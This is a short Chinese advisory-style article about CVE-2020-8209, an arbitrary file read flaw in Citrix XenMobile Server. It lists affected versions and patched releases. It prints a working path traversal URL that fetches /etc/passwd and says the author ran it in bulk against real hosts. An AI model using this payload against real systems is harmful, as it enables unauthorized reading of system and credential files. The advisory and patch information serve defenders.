今天就跟大家聊聊有关Citrix Endpoint Management任意文件读取漏洞CVE-2020-8209示例分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
CVE-2020-8209(Citrix Endpoint Management 任意文件读取)
XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。
Citrix Endpoint Management 存在 任意文件读取漏洞,远程未授权攻击者 通过 发送特制HTTP请求,可以造成 读取受影响设备上任意文件 的影响。
以下版本受到严重影响
XenMobile Server < 10.12 RP2
XenMobile Server < 10.11 RP4
XenMobile Server < 10.10 RP6
XenMobile Server < 10.9 RP5
以下版本受到中等影响
XenMobile Server < 10.12 RP3
XenMobile Server < 10.11 RP6
XenMobile Server < 10.10 RP6
XenMobile Server < 10.9 RP5
POC很简单:直接访问url路径就是
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
直接访问就下载文件了
尝试批量跑了一下(基本上国外的较多使用):
根据版本安装修补程序
XenMobile Server 10.12 RP3 XenMobile Server 10.11 RP6 XenMobile Server 10.10 RP6 XenMobile Server 10.9 RP5
看完上述内容,你们对Citrix Endpoint Management任意文件读取漏洞CVE-2020-8209示例分析有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注亿速云行业资讯频道,感谢大家的支持。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。
